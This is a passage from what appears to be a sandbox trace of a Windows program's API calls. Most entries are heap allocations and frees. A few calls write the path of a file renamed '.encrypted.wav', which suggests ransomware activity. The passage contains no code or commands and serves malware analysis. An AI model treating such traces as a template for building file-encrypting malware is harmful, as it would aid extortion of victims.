CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.encrypted.wav\r\n", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0038.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.encrypted.wav\r\n", cchWideChar=64, lpMultiByteStr=0x7ab380, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 64 [0038.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.335] WriteFile (in: hFile=0x140, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3f, lpOverlapped=0x0) returned 1 [0038.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.335] CloseHandle (hObject=0x140) returned 1 [0038.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.349] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.349] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.350] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.350] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.350] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.350] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0038.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.351] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.354] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | 